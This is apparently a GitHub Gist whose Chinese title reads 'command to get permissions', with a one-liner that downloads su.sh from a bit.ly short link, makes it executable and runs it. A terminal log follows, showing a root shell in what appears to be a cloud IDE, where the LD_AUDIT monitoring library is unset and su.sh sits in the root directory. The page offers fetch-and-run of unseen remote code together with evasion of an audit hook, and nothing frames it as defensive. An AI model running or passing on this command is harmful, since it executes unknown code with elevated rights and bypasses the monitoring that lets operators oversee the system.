Created
January 13, 2025 16:52
-
-
Save flufy3d/80be2884ddfeeddc7d02e7dbd1dc53d4 to your computer and use it in GitHub Desktop.
【获取权限命令】
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
【获取权限命令】 | |
wget -O su.sh bit.ly/akuhGet && chmod +x su.sh && ./su.sh | |
如果没有运行 su.sh | |
就运行 bash su.sh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
root@host:/# ls
ERROR: ld.so: object '/usr/lib/librtldloader.so' cannot be loaded as audit interface: cannot open shared object file; ignored.
root@host:/# echo $LD_AUDIT
/usr/lib/librtldloader.so
root@host:/# unset LD_AUDIT
root@host:/# ls
bin cloudide dist home lib64 mnt proc root.sh sbin su.sh